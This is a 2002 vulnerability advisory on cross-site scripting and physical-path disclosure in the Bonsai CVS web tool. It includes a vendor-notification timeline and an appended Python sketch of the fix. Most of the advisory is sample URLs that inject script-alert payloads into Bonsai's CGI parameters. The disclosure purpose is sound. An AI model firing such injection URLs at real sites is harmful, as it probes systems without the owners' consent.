Author: Stan Bubrouski
Date: 19 August 2002
Product: Bonsai
Versions Affected: All (current and CVS all vulnerable)

Severity:
Cross Site Scripting is possible in several places due to a lack of stripping of tags from input. Some error messages also contain CSS and reveal the physical path of the Bonsai scripts.

Problem:
We all know how CSS works, so I'll just include some sample URLs to demonstrate the problem.

CSS Problems:
/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert(document.domain)</script>
/webtools/bonsai/cvslog.cgi?file=<script>alert(document.domain)</script>
/webtools/bonsai/cvsblame.cgi?file=/index.html&root=<script>alert(document.domain)</script>
/webtools/bonsai/cvsblame.cgi?file=<script>alert(document.domain)</script>
/cvsquery.cgi?branch=<script>alert(document.domain)</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
/cvsquery.cgi?module=<script>alert(document.domain)</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
/showcheckins.cgi?person=<script>alert(document.domain)</script>
/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert(document.domain)</script>&branch=HEAD

Physical Path Revealing and CSS:
/bonsai/cvslog.cgi?file=/index.html&rev=<script>alert(document.domain)</script>&root=/cvsroot/

Physical Path Revealing only:
/bonsai/cvsview2.cgi
/bonsai/multidiff.cgi

As you can see there are many ways to trigger the problems, although most are related to the error output subroutines, plus some subroutines in general which do not properly filter input. Something to keep in mind if anyone out there is using Bonsai. The physical paths are revealed in some instances because Perl error messages (it appears) are written directly onto the web page, exposing the script locations.

Vendor Notification:
Notification of the vulnerability was sent to the Mozilla team on August 5, 2002. After receiving no response on the matter, I sent another message on August 7th and I received a brief response from someone the same day. The problem still exists on mozilla.org and no changes have been made to Bonsai CVS to this very day. The fix seems simple, but I do not have a system to test with so I cannot offer any solution.
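The two defects described above each have a straightforward fix: HTML-escape every query parameter at the point it is written into the page, and keep interpreter error text out of the response. The following is an added Python illustration of both, not Bonsai's own code (the Bonsai scripts are Perl CGI); the parameter names come from the sample cvslog.cgi URL above, while SCRIPT_DIR, lookup_revision and the error text are constructed stand-ins.

```python
import html
import logging
import traceback
from urllib.parse import parse_qs

# Constructed sample: the query string of the cvslog.cgi URL from the advisory.
SAMPLE_QUERY = "file=/index.html&rev=<script>alert(document.domain)</script>&root=/cvsroot/"

# Hypothetical install path; it exists only to show that it must never reach the browser.
SCRIPT_DIR = "/var/www/webtools/bonsai"  # placeholder, not Bonsai's real layout


def parse_query(qs):
    """Return one value per parameter, empty string when a parameter is blank."""
    parsed = parse_qs(qs, keep_blank_values=True)
    return {k: v[0] for k, v in parsed.items()}


def error_page_unsafe(params):
    """The pattern the advisory describes: raw parameters interpolated into HTML."""
    return "<p>Error: cannot find revision %s of %s in %s</p>" % (
        params.get("rev", ""), params.get("file", ""), params.get("root", ""))


def error_page_safe(params):
    """Every untrusted value is HTML-escaped where it enters the markup."""
    esc = {k: html.escape(v, quote=True) for k, v in params.items()}
    return "<p>Error: cannot find revision %s of %s in %s</p>" % (
        esc.get("rev", ""), esc.get("file", ""), esc.get("root", ""))


def lookup_revision(params):
    """Stand-in for the CVS lookup; fails the way a Perl die() would, with the
    script's physical path embedded in the message."""
    raise RuntimeError("open failed at %s/cvslog.cgi line 42" % SCRIPT_DIR)


def handle_request(qs):
    """Log the full error server-side; send the client only the escaped, generic page."""
    params = parse_query(qs)
    try:
        return lookup_revision(params)
    except Exception:
        logging.error("cvslog failure: %s", traceback.format_exc())
        return error_page_safe(params)
```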